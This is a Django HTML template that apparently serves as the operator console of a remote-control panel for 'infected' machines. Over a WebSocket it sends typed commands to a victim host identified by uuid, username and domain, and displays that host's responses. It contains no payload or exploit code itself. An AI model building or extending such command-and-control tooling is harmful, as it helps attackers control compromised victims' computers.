{% extends 'base.html' %}


{% block page_title%}{{ infectado.uuid }} User control{% endblock %}
{% block content %}
<div class="container mt-4">
    <div id="messages" class="border rounded-4 mb-2 p-4" style="height: 500px; overflow-y:scroll; background-color: #505050; color:limegreen;">
    </div>

    <!-- <form hx-post="{% url 'web:user-control-instance' infectado.uuid %}" hx-target="#messages" hx-swap="beforeend" hx-on::after-request="if(event.detail.successful) this.reset()">
        {% csrf_token  %}
        <div class="input-group mb-3">
            <input name="command" type="text" class="form-control" placeholder="Command">
            <button class="btn btn-outline-secondary" type="submit" id="button-send">Send</button>
        </div>
    </form> -->
    
    <div>
        <div class="input-group mb-3">
            <input name="command" id="command" type="text" class="form-control" placeholder="Command">
            <button class="btn btn-outline-secondary" id="button-send">Send</button>
        </div>
    </div>
</div>
<script>
    const socket = new WebSocket(
        'ws://'
        + window.location.host
        + '/ws/instance/'
        + '{{ infectado.uuid }}'
        + '/'
    );
    socket.onmessage = (e) => {
        datos = JSON.parse(e.data);
        if ("command" in datos) {
            document.getElementById("messages").innerHTML += `<p style="margin-bottom: -6px;"><b>{{ user.username }}</b>: ${datos.command}</p>`;
        }
        if ("response" in datos) {
            document.getElementById("messages").innerHTML += `<p style="margin-bottom: -6px;"><b>{{ infectado.username }}@{{ infectado.domain }}</b>: ${datos.response}</p>`;
        }
    }
    socket.onclose = (e) => {
        console.log("Socket closed!");
    }

    document.getElementById('command').onkeyup = function (e) {
        if (e.keyCode === 13) {
            document.getElementById('button-send').click();
        }
    };
    document.getElementById("button-send").onclick = (e) => {
        inputfield = document.getElementById("command");
        exp = inputfield.value;
        socket.send(JSON.stringify(
            {
                'command': exp
            }
        ))
        inputfield.value = "";
    }
</script>
{% endblock %}